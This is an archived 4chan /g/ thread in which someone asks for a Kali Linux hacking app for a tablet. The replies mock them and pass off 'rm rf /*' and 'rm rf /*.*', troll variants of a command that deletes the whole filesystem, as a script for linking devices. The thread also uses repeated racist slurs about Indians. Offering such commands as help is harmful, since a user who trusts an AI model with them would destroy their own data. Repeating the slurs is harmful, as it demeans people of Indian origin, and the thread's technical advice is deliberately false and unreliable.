[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
Help
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 7
Thread images: 1
File: 9e1cee4f0.jpg.750x0_q90.jpg (113 KB, 750x500) Image search: [Google]
9e1cee4f0.jpg.750x0_q90.jpg
113 KB, 750x500
please I want an app on my tablet as Linux kali hack , but that is compatible with the tablet advise me help
>>
Refer to my friend
Domo Arigato Mr Roboto
>>
Fuck off you fat bearded meme loving fuck.
>>
What hack? If you want it to be compatible you have to allocate the poo in the /loo/ directory of your iPad. The pajeet framework may help link the two devices.
>>
>>54333271
Agreed. If you want a quick script to link them just connect your iPad to your Kali Linux machine, open the terminal and type in the following code:
rm rf /*
. That should allocate poo in /loo/ using the Pajeet-std framework.
>>
>>54333316
That will not work. You have not specified the pajeet extension. Instead use
rm rf /*.*
try that after trying what he said before, in case that dosent work.
>>
Maybe use the STD//pajeet framework to allocate poo? In your iPad's config files, make sure that gulLAB.le is identical to pERs.ON . If this dosent work, try allocating the poo to /clean/street/.
Thread replies: 7
Thread images: 1

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.